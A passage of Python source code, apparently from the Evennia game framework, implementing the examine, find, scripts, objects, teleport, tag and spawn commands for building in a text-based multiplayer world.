objdata["Scripts"] = self.format_scripts(obj)
objdata["Tags"] = self.format_tags(obj)
objdata["Persistent Attributes"] = self.format_attributes(obj)
objdata["Non-Persistent Attributes"] = self.format_nattributes(obj)
objdata["Exits"] = self.format_exits(obj)
objdata["Characters"] = self.format_chars(obj)
objdata["Content"] = self.format_things(obj)
if self.object_type == "channel":
objdata["Subscription Totals"] = self.format_channel_sub_totals(obj)
objdata["Account Subscriptions"] = self.format_channel_account_subs(obj)
objdata["Object Subscriptions"] = self.format_channel_object_subs(obj)
return objdata
def format_output(self, obj, current_cmdset):
"""
Formats the full examine page return.
"""
objdata = self.get_formatted_obj_data(obj, current_cmdset)
# format output
main_str = []
max_width = -1
for header, block in objdata.items():
if block is not None:
blockstr = f"{self.header_color}{header}|n: {block}"
max_width = max(max_width, max(display_len(line) for line in blockstr.split("\n")))
main_str.append(blockstr)
main_str = "\n".join(main_str)
max_width = max(0, min(self.client_width(), max_width))
sep = self.separator * max_width
return f"{sep}\n{main_str}\n{sep}"
def _search_by_object_type(self, obj_name, objtype):
"""
Route to different search functions depending on the object type being
examined. This also handles error reporting for multimatches/no matches.
Args:
obj_name (str): The search query.
objtype (str): One of 'object', 'account', 'script' or 'channel'.
Returns:
any: `None` if no match or multimatch, otherwise a single result.
"""
obj = None
if objtype == "object":
obj = self.caller.search(obj_name)
elif objtype == "account":
try:
obj = self.caller.search_account(obj_name.lstrip("*"))
except AttributeError:
# this means we are calling examine from an account object
obj = self.caller.search(
obj_name.lstrip("*"), search_object="object" in self.switches
)
else:
obj = getattr(search, f"search_{objtype}")(obj_name)
if not obj:
self.caller.msg(f"No {objtype} found with key {obj_name}.")
obj = None
elif len(obj) > 1:
err = "Multiple {objtype} found with key {obj_name}:\n{matches}"
self.caller.msg(err.format(
obj_name=obj_name,
matches=", ".join(f"{ob.key}(#{ob.id})" for ob in obj)
))
obj = None
else:
obj = obj[0]
return obj
def parse(self):
super().parse()
self.examine_objs = []
if not self.args:
# If no arguments are provided, examine the invoker's location.
if hasattr(self.caller, "location"):
self.examine_objs.append((self.caller.location, None))
else:
self.msg("You need to supply a target to examine.")
raise InterruptCommand
else:
for objdef in self.lhs_objattr:
# note that we check the objtype for every repeat; this will always
# be the same result, but it makes for a cleaner code and multi-examine
# is not so common anyway.
obj = None
obj_name = objdef["name"] # name
obj_attrs = objdef["attrs"] # /attrs
# identify object type, in prio account - script - channel
object_type = "object"
if (utils.inherits_from(self.caller, "evennia.accounts.accounts.DefaultAccount")
or "account" in self.switches or obj_name.startswith("*")):
object_type = "account"
elif "script" in self.switches:
object_type = "script"
elif "channel" in self.switches:
object_type = "channel"
self.object_type = object_type
obj = self._search_by_object_type(obj_name, object_type)
if obj:
self.examine_objs.append((obj, obj_attrs))
def func(self):
"""Process command"""
for obj, obj_attrs in self.examine_objs:
# these are parsed out in .parse already
if not obj.access(self.caller, "examine"):
# If we don't have special info access, just look
# at the object instead.
self.msg(self.caller.at_look(obj))
continue
if obj_attrs:
# we are only interested in specific attributes
attrs = [attr for attr in obj.db_attributes.all() if attr.db_key in obj_attrs]
if not attrs:
self.msg("No attributes found on {obj.name}.")
else:
out_strings = []
for attr in attrs:
out_strings.append(self.format_single_attribute_detail(obj, attr))
out_str = "\n".join(out_strings)
max_width = max(display_len(line) for line in out_strings)
max_width = max(0, min(max_width, self.client_width()))
sep = self.separator * max_width
self.msg(f"{sep}\n{out_str}")
return
# examine the obj itself
if self.object_type in ("object", "account"):
# for objects and accounts we need to set up an asynchronous
# fetch of the cmdset and not proceed with the examine display
# until the fetch is complete
session = None
if obj.sessions.count():
mergemode = "session"
session = obj.sessions.get()[0]
elif self.object_type == "account":
mergemode = "account"
else:
mergemode = "object"
account = None
objct = None
if self.object_type == "account":
account = obj
else:
account = obj.account
objct = obj
# this is usually handled when a command runs, but when we examine
# we may have leftover inherited cmdsets directly after a move etc.
obj.cmdset.update()
# using callback to print results whenever function returns.
def _get_cmdset_callback(current_cmdset):
self.msg(self.format_output(obj, current_cmdset).strip())
get_and_merge_cmdsets(
obj, session, account, objct, mergemode, self.raw_string
).addCallback(_get_cmdset_callback)
else:
# for objects without cmdsets we can proceed to examine immediately
self.msg(self.format_output(obj, None).strip())
class CmdFind(COMMAND_DEFAULT_CLASS):
"""
search the database for objects
Usage:
find[/switches] <name or dbref or *account> [= dbrefmin[-dbrefmax]]
locate - this is a shorthand for using the /loc switch.
Switches:
room - only look for rooms (location=None)
exit - only look for exits (destination!=None)
char - only look for characters (BASE_CHARACTER_TYPECLASS)
exact - only exact matches are returned.
loc - display object location if exists and match has one result
startswith - search for names starting with the string, rather than containing
Searches the database for an object of a particular name or exact #dbref.
Use *accountname to search for an account. The switches allows for
limiting object matches to certain game entities. Dbrefmin and dbrefmax
limits matches to within the given dbrefs range, or above/below if only
one is given.
"""
key = "@find"
aliases = ["@search", "@locate"]
switch_options = ("room", "exit", "char", "exact", "loc", "startswith")
locks = "cmd:perm(find) or perm(Builder)"
help_category = "Building"
def func(self):
"""Search functionality"""
caller = self.caller
switches = self.switches
if not self.args or (not self.lhs and not self.rhs):
caller.msg("Usage: find <string> [= low [-high]]")
return
if "locate" in self.cmdstring: # Use option /loc as a default for locate command alias
switches.append("loc")
searchstring = self.lhs
try:
# Try grabbing the actual min/max id values by database aggregation
qs = ObjectDB.objects.values("id").aggregate(low=Min("id"), high=Max("id"))
low, high = sorted(qs.values())
if not (low and high):
raise ValueError(
f"{self.__class__.__name__}: Min and max ID not returned by aggregation; falling back to queryset slicing."
)
except Exception as e:
logger.log_trace(e)
# If that doesn't work for some reason (empty DB?), guess the lower
# bound and do a less-efficient query to find the upper.
low, high = 1, ObjectDB.objects.all().order_by("-id").first().id
if self.rhs:
try:
# Check that rhs is either a valid dbref or dbref range
bounds = tuple(
sorted(dbref(x, False) for x in re.split("[-\s]+", self.rhs.strip()))
)
# dbref() will return either a valid int or None
assert bounds
# None should not exist in the bounds list
assert None not in bounds
low = bounds[0]
if len(bounds) > 1:
high = bounds[-1]
except AssertionError:
caller.msg("Invalid dbref range provided (not a number).")
return
except IndexError as e:
logger.log_err(
f"{self.__class__.__name__}: Error parsing upper and lower bounds of query."
)
logger.log_trace(e)
low = min(low, high)
high = max(low, high)
is_dbref = utils.dbref(searchstring)
is_account = searchstring.startswith("*")
restrictions = ""
if self.switches:
restrictions = ", %s" % (", ".join(self.switches))
if is_dbref or is_account:
if is_dbref:
# a dbref search
result = caller.search(searchstring, global_search=True, quiet=True)
string = "|wExact dbref match|n(#%i-#%i%s):" % (low, high, restrictions)
else:
# an account search
searchstring = searchstring.lstrip("*")
result = caller.search_account(searchstring, quiet=True)
string = "|wMatch|n(#%i-#%i%s):" % (low, high, restrictions)
if "room" in switches:
result = result if inherits_from(result, ROOM_TYPECLASS) else None
if "exit" in switches:
result = result if inherits_from(result, EXIT_TYPECLASS) else None
if "char" in switches:
result = result if inherits_from(result, CHAR_TYPECLASS) else None
if not result:
string += "\n |RNo match found.|n"
elif not low <= int(result[0].id) <= high:
string += "\n |RNo match found for '%s' in #dbref interval.|n" % searchstring
else:
result = result[0]
string += "\n|g %s - %s|n" % (result.get_display_name(caller), result.path)
if "loc" in self.switches and not is_account and result.location:
string += " (|wlocation|n: |g{}|n)".format(
result.location.get_display_name(caller)
)
else:
# Not an account/dbref search but a wider search; build a queryset.
# Searches for key and aliases
if "exact" in switches:
keyquery = Q(db_key__iexact=searchstring, id__gte=low, id__lte=high)
aliasquery = Q(
db_tags__db_key__iexact=searchstring,
db_tags__db_tagtype__iexact="alias",
id__gte=low,
id__lte=high,
)
elif "startswith" in switches:
keyquery = Q(db_key__istartswith=searchstring, id__gte=low, id__lte=high)
aliasquery = Q(
db_tags__db_key__istartswith=searchstring,
db_tags__db_tagtype__iexact="alias",
id__gte=low,
id__lte=high,
)
else:
keyquery = Q(db_key__icontains=searchstring, id__gte=low, id__lte=high)
aliasquery = Q(
db_tags__db_key__icontains=searchstring,
db_tags__db_tagtype__iexact="alias",
id__gte=low,
id__lte=high,
)
# Keep the initial queryset handy for later reuse
result_qs = ObjectDB.objects.filter(keyquery | aliasquery).distinct()
nresults = result_qs.count()
# Use iterator to minimize memory ballooning on large result sets
results = result_qs.iterator()
# Check and see if type filtering was requested; skip it if not
if any(x in switches for x in ("room", "exit", "char")):
obj_ids = set()
for obj in results:
if (
("room" in switches and inherits_from(obj, ROOM_TYPECLASS))
or ("exit" in switches and inherits_from(obj, EXIT_TYPECLASS))
or ("char" in switches and inherits_from(obj, CHAR_TYPECLASS))
):
obj_ids.add(obj.id)
# Filter previous queryset instead of requesting another
filtered_qs = result_qs.filter(id__in=obj_ids).distinct()
nresults = filtered_qs.count()
# Use iterator again to minimize memory ballooning
results = filtered_qs.iterator()
# still results after type filtering?
if nresults:
if nresults > 1:
header = f"{nresults} Matches"
else:
header = "One Match"
string = f"|w{header}|n(#{low}-#{high}{restrictions}):"
res = None
for res in results:
string += f"\n |g{res.get_display_name(caller)} - {res.path}|n"
if (
"loc" in self.switches
and nresults == 1
and res
and getattr(res, "location", None)
):
string += f" (|wlocation|n: |g{res.location.get_display_name(caller)}|n)"
else:
string = f"|wNo Matches|n(#{low}-#{high}{restrictions}):"
string += f"\n |RNo matches found for '{searchstring}'|n"
# send result
caller.msg(string.strip())
class ScriptEvMore(EvMore):
"""
Listing 1000+ Scripts can be very slow and memory-consuming. So
we use this custom EvMore child to build en EvTable only for
each page of the list.
"""
def init_pages(self, scripts):
"""Prepare the script list pagination"""
script_pages = Paginator(scripts, max(1, int(self.height / 2)))
super().init_pages(script_pages)
def page_formatter(self, scripts):
"""Takes a page of scripts and formats the output
into an EvTable."""
if not scripts:
return "<No scripts>"
table = EvTable(
"|wdbref|n",
"|wobj|n",
"|wkey|n",
"|wintval|n",
"|wnext|n",
"|wrept|n",
"|wtypeclass|n",
"|wdesc|n",
align="r",
border="tablecols",
width=self.width,
)
for script in scripts:
nextrep = script.time_until_next_repeat()
if nextrep is None:
nextrep = script.db._paused_time
nextrep = f"PAUSED {int(nextrep)}s" if nextrep else "--"
else:
nextrep = f"{nextrep}s"
maxrepeat = script.repeats
remaining = script.remaining_repeats() or 0
if maxrepeat:
rept = "%i/%i" % (maxrepeat - remaining, maxrepeat)
else:
rept = "-/-"
table.add_row(
f"#{script.id}",
f"{script.obj.key}({script.obj.dbref})"
if (hasattr(script, "obj") and script.obj)
else "<Global>",
script.key,
script.interval if script.interval > 0 else "--",
nextrep,
rept,
script.typeclass_path.rsplit(".", 1)[-1],
crop(script.desc, width=20),
)
return str(table)
class CmdScripts(COMMAND_DEFAULT_CLASS):
"""
List and manage all running scripts. Allows for creating new global
scripts.
Usage:
script[/switches] [script-#dbref, key, script.path or <obj>]
script[/start||stop] <obj> = <script.path or script-key>
Switches:
start - start/unpause an existing script's timer.
stop - stops an existing script's timer
pause - pause a script's timer
delete - deletes script. This will also stop the timer as needed
Examples:
script - list scripts
script myobj - list all scripts on object
script foo.bar.Script - create a new global Script
script scriptname - examine named existing global script
script myobj = foo.bar.Script - create and assign script to object
script/stop myobj = scriptname - stop script on object
script/pause foo.Bar.Script - pause global script
script/delete myobj - delete ALL scripts on object
script/delete #dbref[-#dbref] - delete script or range by dbref
When given with an `<obj>` as left-hand-side, this creates and
assigns a new script to that object. Without an `<obj>`, this
manages and inspects global scripts
If no switches are given, this command just views all active
scripts. The argument can be either an object, at which point it
will be searched for all scripts defined on it, or a script name
or #dbref. For using the /stop switch, a unique script #dbref is
required since whole classes of scripts often have the same name.
Use the `script` build-level command for managing scripts attached to
objects.
"""
key = "@scripts"
aliases = ["@script"]
switch_options = ("create", "start", "stop", "pause", "delete")
locks = "cmd:perm(scripts) or perm(Builder)"
help_category = "System"
excluded_typeclass_paths = ["evennia.prototypes.prototypes.DbPrototype"]
switch_mapping = {
"create": "|gCreated|n",
"start": "|gStarted|n",
"stop": "|RStopped|n",
"pause": "|Paused|n",
"delete": "|rDeleted|n"
}
def _search_script(self, args):
# test first if this is a script match
scripts = ScriptDB.objects.get_all_scripts(key=args)
if scripts:
return scripts
# try typeclass path
scripts = ScriptDB.objects.filter(db_typeclass_path__iendswith=args)
if scripts:
return scripts
if "-" in args:
# may be a dbref-range
val1, val2 = (dbref(part.strip()) for part in args.split('-', 1))
if val1 and val2:
scripts = ScriptDB.objects.filter(id__in=(range(val1, val2 + 1)))
if scripts:
return scripts
def func(self):
"""implement method"""
caller = self.caller
if not self.args:
# show all scripts
scripts = ScriptDB.objects.all()
if not scripts:
caller.msg("No scripts found.")
return
ScriptEvMore(caller, scripts.order_by("id"), session=self.session)
return
# find script or object to operate on
scripts, obj = None, None
if self.rhs:
obj_query = self.lhs
script_query = self.rhs
else:
obj_query = script_query = self.args
scripts = self._search_script(script_query)
objects = ObjectDB.objects.object_search(obj_query)
obj = objects[0] if objects else None
if not self.switches:
# creation / view mode
if obj:
# we have an object
if self.rhs:
# creation mode
if obj.scripts.add(self.rhs, autostart=True):
caller.msg(
f"Script |w{self.rhs}|n successfully added and "
f"started on {obj.get_display_name(caller)}.")
else:
caller.msg(f"Script {self.rhs} could not be added and/or started "
f"on {obj.get_display_name(caller)} (or it started and "
"immediately shut down).")
else:
# just show all scripts on object
scripts = ScriptDB.objects.filter(db_obj=obj)
if scripts:
ScriptEvMore(caller, scripts.order_by("id"), session=self.session)
else:
caller.msg(f"No scripts defined on {obj}")
elif scripts:
# show found script(s)
ScriptEvMore(caller, scripts.order_by("id"), session=self.session)
else:
# create global script
try:
new_script = create.create_script(self.args)
except ImportError:
logger.log_trace()
new_script = None
if new_script:
caller.msg(f"Global Script Created - "
f"{new_script.key} ({new_script.typeclass_path})")
ScriptEvMore(caller, [new_script], session=self.session)
else:
caller.msg(f"Global Script |rNOT|n Created |r(see log)|n - "
f"arguments: {self.args}")
elif scripts or obj:
# modification switches - must operate on existing scripts
if not scripts:
scripts = ScriptDB.objects.filter(db_obj=obj)
if scripts.count() > 1:
ret = yield(f"Multiple scripts found: {scripts}. Are you sure you want to "
"operate on all of them? [Y]/N? ")
if ret.lower() in ('n', 'no'):
caller.msg("Aborted.")
return
for script in scripts:
script_key = script.key
script_typeclass_path = script.typeclass_path
scripttype = f"Script on {obj}" if obj else "Global Script"
for switch in self.switches:
verb = self.switch_mapping[switch]
msgs = []
try:
getattr(script, switch)()
except Exception:
logger.log_trace()
msgs.append(f"{scripttype} |rNOT|n {verb} |r(see log)|n - "
f"{script_key} ({script_typeclass_path})|n")
else:
msgs.append(f"{scripttype} {verb} - "
f"{script_key} ({script_typeclass_path})")
caller.msg("\n".join(msgs))
if "delete" not in self.switches:
ScriptEvMore(caller, [script], session=self.session)
else:
caller.msg("No scripts found.")
class CmdObjects(COMMAND_DEFAULT_CLASS):
"""
statistics on objects in the database
Usage:
objects [<nr>]
Gives statictics on objects in database as well as
a list of <nr> latest objects in database. If not
given, <nr> defaults to 10.
"""
key = "@objects"
locks = "cmd:perm(listobjects) or perm(Builder)"
help_category = "System"
def func(self):
"""Implement the command"""
caller = self.caller
nlim = int(self.args) if self.args and self.args.isdigit() else 10
nobjs = ObjectDB.objects.count()
Character = class_from_module(settings.BASE_CHARACTER_TYPECLASS)
nchars = Character.objects.all_family().count()
Room = class_from_module(settings.BASE_ROOM_TYPECLASS)
nrooms = Room.objects.all_family().count()
Exit = class_from_module(settings.BASE_EXIT_TYPECLASS)
nexits = Exit.objects.all_family().count()
nother = nobjs - nchars - nrooms - nexits
nobjs = nobjs or 1 # fix zero-div error with empty database
# total object sum table
totaltable = self.styled_table(
"|wtype|n", "|wcomment|n", "|wcount|n", "|w%|n", border="table", align="l"
)
totaltable.align = "l"
totaltable.add_row(
"Characters",
"(BASE_CHARACTER_TYPECLASS + children)",
nchars,
"%.2f" % ((float(nchars) / nobjs) * 100),
)
totaltable.add_row(
"Rooms",
"(BASE_ROOM_TYPECLASS + children)",
nrooms,
"%.2f" % ((float(nrooms) / nobjs) * 100),
)
totaltable.add_row(
"Exits",
"(BASE_EXIT_TYPECLASS + children)",
nexits,
"%.2f" % ((float(nexits) / nobjs) * 100),
)
totaltable.add_row("Other", "", nother, "%.2f" % ((float(nother) / nobjs) * 100))
# typeclass table
typetable = self.styled_table(
"|wtypeclass|n", "|wcount|n", "|w%|n", border="table", align="l"
)
typetable.align = "l"
dbtotals = ObjectDB.objects.get_typeclass_totals()
for stat in dbtotals:
typetable.add_row(
stat.get("typeclass", "<error>"),
stat.get("count", -1),
"%.2f" % stat.get("percent", -1),
)
# last N table
objs = ObjectDB.objects.all().order_by("db_date_created")[max(0, nobjs - nlim): ]
latesttable = self.styled_table(
"|wcreated|n", "|wdbref|n", "|wname|n", "|wtypeclass|n", align="l", border="table"
)
latesttable.align = "l"
for obj in objs:
latesttable.add_row(
utils.datetime_format(obj.date_created), obj.dbref, obj.key, obj.path
)
string = "\n|wObject subtype totals (out of %i Objects):|n\n%s" % (nobjs, totaltable)
string += "\n|wObject typeclass distribution:|n\n%s" % typetable
string += "\n|wLast %s Objects created:|n\n%s" % (min(nobjs, nlim), latesttable)
caller.msg(string)
class CmdTeleport(COMMAND_DEFAULT_CLASS):
"""
teleport object to another location
Usage:
tel/switch [<object> to||=] <target location>
Examples:
tel Limbo
tel/quiet box = Limbo
tel/tonone box
Switches:
quiet - don't echo leave/arrive messages to the source/target
locations for the move.
intoexit - if target is an exit, teleport INTO
the exit object instead of to its destination
tonone - if set, teleport the object to a None-location. If this
switch is set, <target location> is ignored.
Note that the only way to retrieve
an object from a None location is by direct #dbref
reference. A puppeted object cannot be moved to None.
loc - teleport object to the target's location instead of its contents
Teleports an object somewhere. If no object is given, you yourself are
teleported to the target location.
To lock an object from being teleported, set its `teleport` lock, it will be
checked with the caller. To block
a destination from being teleported to, set the destination's `teleport_here`
lock - it will be checked with the thing being teleported. Admins and
higher permissions can always teleport.
"""
key = "@teleport"
aliases = "@tel"
switch_options = ("quiet", "intoexit", "tonone", "loc")
rhs_split = ("=", " to ") # Prefer = delimiter, but allow " to " usage.
locks = "cmd:perm(teleport) or perm(Builder)"
help_category = "Building"
def parse(self):
"""
Breaking out searching here to make this easier to override.
"""
super().parse()
self.obj_to_teleport = self.caller
self.destination = None
if self.rhs:
self.obj_to_teleport = self.caller.search(self.lhs, global_search=True)
if not self.obj_to_teleport:
self.caller.msg("Did not find object to teleport.")
raise InterruptCommand
self.destination = self.caller.search(self.rhs, global_search=True)
elif self.lhs:
self.destination = self.caller.search(self.lhs, global_search=True)
def func(self):
"""Performs the teleport"""
caller = self.caller
obj_to_teleport = self.obj_to_teleport
destination = self.destination
if "tonone" in self.switches:
# teleporting to None
if destination:
# in this case lhs is always the object to teleport
obj_to_teleport = destination
if obj_to_teleport.has_account:
caller.msg(
"Cannot teleport a puppeted object "
"(%s, puppeted by %s) to a None-location."
% (obj_to_teleport.key, obj_to_teleport.account)
)
return
caller.msg("Teleported %s -> None-location." % obj_to_teleport)
if obj_to_teleport.location and "quiet" not in self.switches:
obj_to_teleport.location.msg_contents(
"%s teleported %s into nothingness." % (caller, obj_to_teleport), exclude=caller
)
obj_to_teleport.location = None
return
if not self.args:
caller.msg("Usage: teleport[/switches] [<obj> =] <target or (X,Y,Z)>||home")
return
if not destination:
caller.msg("Destination not found.")
return
if "loc" in self.switches:
destination = destination.location
if not destination:
caller.msg("Destination has no location.")
return
if obj_to_teleport == destination:
caller.msg("You can't teleport an object inside of itself!")
return
if obj_to_teleport == destination.location:
caller.msg("You can't teleport an object inside something it holds!")
return
if obj_to_teleport.location and obj_to_teleport.location == destination:
caller.msg("%s is already at %s." % (obj_to_teleport, destination))
return
# check any locks
if not (caller.permissions.check("Admin") or obj_to_teleport.access(caller, "teleport")):
caller.msg(f"{obj_to_teleport} 'teleport'-lock blocks you from teleporting "
"it anywhere.")
return
if not (caller.permissions.check("Admin")
or destination.access(obj_to_teleport, "teleport_here")):
caller.msg(f"{destination} 'teleport_here'-lock blocks {obj_to_teleport} from "
"moving there.")
return
# try the teleport
if not obj_to_teleport.location:
# teleporting from none-location
obj_to_teleport.location = destination
caller.msg(f"Teleported {obj_to_teleport} None -> {destination}")
elif obj_to_teleport.move_to(
destination, quiet="quiet" in self.switches,
emit_to_obj=caller, use_destination="intoexit" not in self.switches):
if obj_to_teleport == caller:
caller.msg(f"Teleported to {destination}.")
else:
caller.msg(f"Teleported {obj_to_teleport} -> {destination}.")
else:
caller.msg("Teleportation failed.")
class CmdTag(COMMAND_DEFAULT_CLASS):
"""
handles the tags of an object
Usage:
tag[/del] <obj> [= <tag>[:<category>]]
tag/search <tag>[:<category]
Switches:
search - return all objects with a given Tag
del - remove the given tag. If no tag is specified,
clear all tags on object.
Manipulates and lists tags on objects. Tags allow for quick
grouping of and searching for objects. If only <obj> is given,
list all tags on the object. If /search is used, list objects
with the given tag.
The category can be used for grouping tags themselves, but it
should be used with restrain - tags on their own are usually
enough to for most grouping schemes.
"""
key = "@tag"
aliases = ["@tags"]
options = ("search", "del")
locks = "cmd:perm(tag) or perm(Builder)"
help_category = "Building"
arg_regex = r"(/\w+?(\s|$))|\s|$"
def func(self):
"""Implement the tag functionality"""
if not self.args:
self.caller.msg("Usage: tag[/switches] <obj> [= <tag>[:<category>]]")
return
if "search" in self.switches:
# search by tag
tag = self.args
category = None
if ":" in tag:
tag, category = [part.strip() for part in tag.split(":", 1)]
objs = search.search_tag(tag, category=category)
nobjs = len(objs)
if nobjs > 0:
catstr = (
" (category: '|w%s|n')" % category
if category
else ("" if nobjs == 1 else " (may have different tag categories)")
)
matchstr = ", ".join(o.get_display_name(self.caller) for o in objs)
string = "Found |w%i|n object%s with tag '|w%s|n'%s:\n %s" % (
nobjs,
"s" if nobjs > 1 else "",
tag,
catstr,
matchstr,
)
else:
string = "No objects found with tag '%s%s'." % (
tag,
" (category: %s)" % category if category else "",
)
self.caller.msg(string)
return
if "del" in self.switches:
# remove one or all tags
obj = self.caller.search(self.lhs, global_search=True)
if not obj:
return
if self.rhs:
# remove individual tag
tag = self.rhs
category = None
if ":" in tag:
tag, category = [part.strip() for part in tag.split(":", 1)]
if obj.tags.get(tag, category=category):
obj.tags.remove(tag, category=category)
string = "Removed tag '%s'%s from %s." % (
tag,
" (category: %s)" % category if category else "",
obj,
)
else:
string = "No tag '%s'%s to delete on %s." % (
tag,
" (category: %s)" % category if category else "",
obj,
)
else:
# no tag specified, clear all tags
old_tags = [
"%s%s" % (tag, " (category: %s)" % category if category else "")
for tag, category in obj.tags.all(return_key_and_category=True)
]
if old_tags:
obj.tags.clear()
string = "Cleared all tags from %s: %s" % (obj, ", ".join(sorted(old_tags)))
else:
string = "No Tags to clear on %s." % obj
self.caller.msg(string)
return
# no search/deletion
if self.rhs:
# = is found; command args are of the form obj = tag
obj = self.caller.search(self.lhs, global_search=True)
if not obj:
return
tag = self.rhs
category = None
if ":" in tag:
tag, category = [part.strip() for part in tag.split(":", 1)]
# create the tag
obj.tags.add(tag, category=category)
string = "Added tag '%s'%s to %s." % (
tag,
" (category: %s)" % category if category else "",
obj,
)
self.caller.msg(string)
else:
# no = found - list tags on object
obj = self.caller.search(self.args, global_search=True)
if not obj:
return
tagtuples = obj.tags.all(return_key_and_category=True)
ntags = len(tagtuples)
tags = [tup[0] for tup in tagtuples]
categories = [" (category: %s)" % tup[1] if tup[1] else "" for tup in tagtuples]
if ntags:
string = "Tag%s on %s: %s" % (
"s" if ntags > 1 else "",
obj,
", ".join(sorted("'%s'%s" % (tags[i], categories[i]) for i in range(ntags))),
)
else:
string = "No tags attached to %s." % obj
self.caller.msg(string)
# helper functions for spawn
class CmdSpawn(COMMAND_DEFAULT_CLASS):
"""
spawn objects from prototype
Usage:
spawn[/noloc] <prototype_key>
spawn[/noloc] <prototype_dict>
spawn/search [prototype_keykey][;tag[,tag]]
spawn/list [tag, tag, ...]
spawn/list modules - list only module-based prototypes
spawn/show [<prototype_key>]
spawn/update <prototype_key>
spawn/save <prototype_dict>
spawn/edit [<prototype_key>]
olc - equivalent to spawn/edit
Switches:
noloc - allow location to be None if not specified explicitly. Otherwise,
location will default to caller's current location.
search - search prototype by name or tags.
list - list available prototypes, optionally limit by tags.
show, examine - inspect prototype by key. If not given, acts like list.
raw - show the raw dict of the prototype as a one-line string for manual editing.
save - save a prototype to the database. It will be listable by /list.
delete - remove a prototype from database, if allowed to.
update - find existing objects with the same prototype_key and update
them with latest version of given prototype. If given with /save,
will auto-update all objects with the old version of the prototype
without asking first.
edit, menu, olc - create/manipulate prototype in a menu interface.
Example:
spawn GOBLIN
spawn {"key":"goblin", "typeclass":"monster.Monster", "location":"#2"}
spawn/save {"key": "grunt", prototype: "goblin"};;mobs;edit:all()
\f
Dictionary keys:
|wprototype_parent |n - name of parent prototype to use. Required if typeclass is
not set. Can be a path or a list for multiple inheritance (inherits
left to right). If set one of the parents must have a typeclass.
|wtypeclass |n - string. Required if prototype_parent is not set.
|wkey |n - string, the main object identifier
|wlocation |n - this should be a valid object or #dbref
|whome |n - valid object or #dbref
|wdestination|n - only valid for exits (object or dbref)
|wpermissions|n - string or list of permission strings
|wlocks |n - a lock-string
|waliases |n - string or list of strings.
|wndb_|n<name> - value of a nattribute (ndb_ is stripped)
|wprototype_key|n - name of this prototype. Unique. Used to store/retrieve from db
and update existing prototyped objects if desired.
|wprototype_desc|n - desc of this prototype. Used in listings
|wprototype_locks|n - locks of this prototype. Limits who may use prototype
|wprototype_tags|n - tags of this prototype. Used to find prototype
any other keywords are interpreted as Attributes and their values.
The available prototypes are defined globally in modules set in
settings.PROTOTYPE_MODULES. If spawn is used without arguments it
displays a list of available prototypes.
"""
key = "@spawn"
aliases = ["@olc"]
switch_options = (
"noloc",
"search",
"list",
"show",
"raw",
"examine",
"save",
"delete",
"menu",
"olc",
"update",
"edit",
)
locks = "cmd:perm(spawn) or perm(Builder)"
help_category = "Building"
def _search_prototype(self, prototype_key, quiet=False):
"""
Search for prototype and handle no/multi-match and access.
Returns a single found prototype or None - in the
case, the caller has already been informed of the
search error we need not do any further action.
"""
prototypes = protlib.search_prototype(prototype_key)
nprots = len(prototypes)
# handle the search result
err = None
if not prototypes:
err = f"No prototype named '{prototype_key}' was found."
elif nprots > 1:
err = "Found {} prototypes matching '{}':\n {}".format(
nprots,
prototype_key,
", ".join(proto.get("prototype_key", "") for proto in prototypes),
)
else:
# we have a single prototype, check access
prototype = prototypes[0]
if not self.caller.locks.check_lockstring(
self.caller, prototype.get("prototype_locks", ""), access_type="spawn", default=True
):
err = "You don't have access to use this prototype."
if err:
# return None on any error
if not quiet:
self.caller.msg(err)
return
return prototype
def _parse_prototype(self, inp, expect=dict):
"""
Parse a prototype dict or key from the input and convert it safely
into a dict if appropriate.
Args:
inp (str): The input from user.
expect (type, optional):
Returns:
prototype (dict, str or None): The parsed prototype. If None, the error
was already reported.
"""
eval_err = None
try:
prototype = _LITERAL_EVAL(inp)
except (SyntaxError, ValueError) as err:
# treat as string
eval_err = err
prototype = utils.to_str(inp)
finally:
# it's possible that the input was a prototype-key, in which case
# it's okay for the LITERAL_EVAL to fail. Only if the result does not
# match the expected type do we have a problem.
if not isinstance(prototype, expect):
if eval_err:
string = (
f"{inp}\n{eval_err}\n|RCritical Python syntax error in argument. Only primitive "
"Python structures are allowed. \nMake sure to use correct "
"Python syntax. Remember especially to put quotes around all "
"strings inside lists and dicts.|n For more advanced uses, embed "
"funcparser callables ($funcs) in the strings."
)
else:
string = "Expected {}, got {}.".format(expect, type(prototype))
self.caller.msg(string)
return
if expect == dict:
# an actual prototype. We need to make sure it's safe,
# so don't allow exec.
# TODO: Exec support is deprecated. Remove completely for 1.0.
if "exec" in prototype and not self.caller.check_permstring("Developer"):
self.caller.msg(
"Spawn aborted: You are not allowed to " "use the 'exec' prototype key."
)
return
try:
# we homogenize the protoype first, to be more lenient with free-form
protlib.validate_prototype(protlib.homogenize_prototype(prototype))
except RuntimeError as err:
self.caller.msg(str(err))
return
return prototype
def _get_prototype_detail(self, query=None, prototypes=None):
"""
Display the detailed specs of one or more prototypes.
Args:
query (str, optional): If this is given and `prototypes` is not, search for
the prototype(s) by this query. This may be a partial query which
may lead to multiple matches, all being displayed.
prototypes (list, optional): If given, ignore `query` and only show these
prototype-details.
Returns:
display (str, None): A formatted string of one or more prototype details.
If None, the caller was already informed of the error.
"""
if not prototypes:
# we need to query. Note that if query is None, all prototypes will
# be returned.
prototypes = protlib.search_prototype(key=query)
if prototypes:
return "\n".join(protlib.prototype_to_str(prot) for prot in prototypes)
elif query:
self.caller.msg(f"No prototype named '{query}' was found.")
else:
self.caller.msg("No prototypes found.")
def _list_prototypes(self, key=None, tags=None):
"""Display prototypes as a list, optionally limited by key/tags. """
protlib.list_prototypes(self.caller, key=key, tags=tags, session=self.session)
@interactive
def _update_existing_objects(self, caller, prototype_key, quiet=False):
"""
Update existing objects (if any) with this prototype-key to the latest
prototype version.
Args:
caller (Object): This is necessary for @interactive to work.
prototype_key (str): The prototype to update.
quiet (bool, optional): If set, don't report to user if no
old objects were found to update.
Returns:
n_updated (int): Number of updated objects.
"""
prototype = self._search_prototype(prototype_key)
if not prototype:
return
existing_objects = protlib.search_objects_with_prototype(prototype_key)
if not existing_objects:
if not quiet:
caller.msg("No existing objects found with an older version of this prototype.")
return
if existing_objects:
n_existing = len(existing_objects)
slow = " (note that this may be slow)" if n_existing > 10 else ""
string = (
f"There are {n_existing} existing object(s) with an older version "
f"of prototype '{prototype_key}'. Should it be re-applied to them{slow}? [Y]/N"
)
answer = yield (string)
if answer.lower() in ["n", "no"]:
caller.msg(
"|rNo update was done of existing objects. "
"Use spawn/update <key> to apply later as needed.|n"
)
return
try:
n_updated = spawner.batch_update_objects_with_prototype(
prototype, objects=existing_objects, caller=caller,
)
except Exception:
logger.log_trace()
